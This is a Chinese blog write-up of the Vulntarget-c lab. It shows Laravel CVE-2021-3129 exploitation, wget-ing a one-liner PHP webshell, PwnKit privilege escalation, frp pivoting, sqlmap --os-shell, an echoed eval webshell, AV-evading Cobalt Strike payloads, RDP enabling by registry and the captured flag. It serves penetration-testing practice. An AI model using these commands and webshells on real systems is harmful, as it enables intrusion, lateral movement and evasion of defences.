Vulntarget-c
Vulntarget-c
环境搭建
这里需要把ubuntu20修改一下网卡
root / root#qwe
1 | vim /etc/netplan/00-installer-config.yaml |

把这两个改成你自己的桥接或者nat的ip(这里是我已经修改后的样子)
1 | netplan apply |
flag01
fscan扫一扫

然后直接上脚本进行getshell
1 | git clone https://github.com/SNCKER/CVE-2021-3129 |
需要修改exp.py中的目标ip


最终在**/var/www/html/public**中找到了index.php

然后就是wget本地写的一句话木马



然后进行msf上线
1 | python -c "import pty;pty.spawn('/bin/bash')" |
1 | 1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable. |
利用第一个exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec成功提权root

flag02
发现了两张网卡

传个fscan进行扫描

这里环境出现了一点问题,ping不同win2016
于是就去开启icmp
Admin#123进入2016
然后控制面板->防火墙

然后就可以ping通了


然后开启frp进行socks代理

10.0.20.100/admin 进入后台登录页面
admin/admin123进入后台

发现存在sql注入
1 | GET /admin/?page=appointments/view_details&id=6 |
sqlmap一把梭
1 | sqlmap -r 1.txt --os-shell |
然后写马
1 | echo ^<^?php $a = $_REQUEST['d'];$a = "$a";$b['test'] = "";eval($b['test']."$a");?^>^ > test.php |
蚁剑开代理密码d连接
发现是system权限

上传普通的马不行,需要免杀
因此这里开了一个cs先上线了ubuntu,然后再上线win2016
这里用的掩日的免杀,首先cs生成payload.c然后进行下面的免杀

生成.exe 和 .txt

成功上线cs


1 | shell type C:\Users\Administrator\flag.txt |
1 | vulntarget{VGhlIGhvc3QgcGFzc3dvcmQgbWF5IGJlIHVzZWQgZm9yIG90aGVyIHB1cnBvc2Vz} +_+ |
flag03
开启3389
1 | reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f |
发现了10.0.10.1/24这个网段
通过相同得密码进入

不知道为什么win2016ping不同ubuntu16
所以只有出此下策,密码也是Admin#123


本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 CQJKL!
评论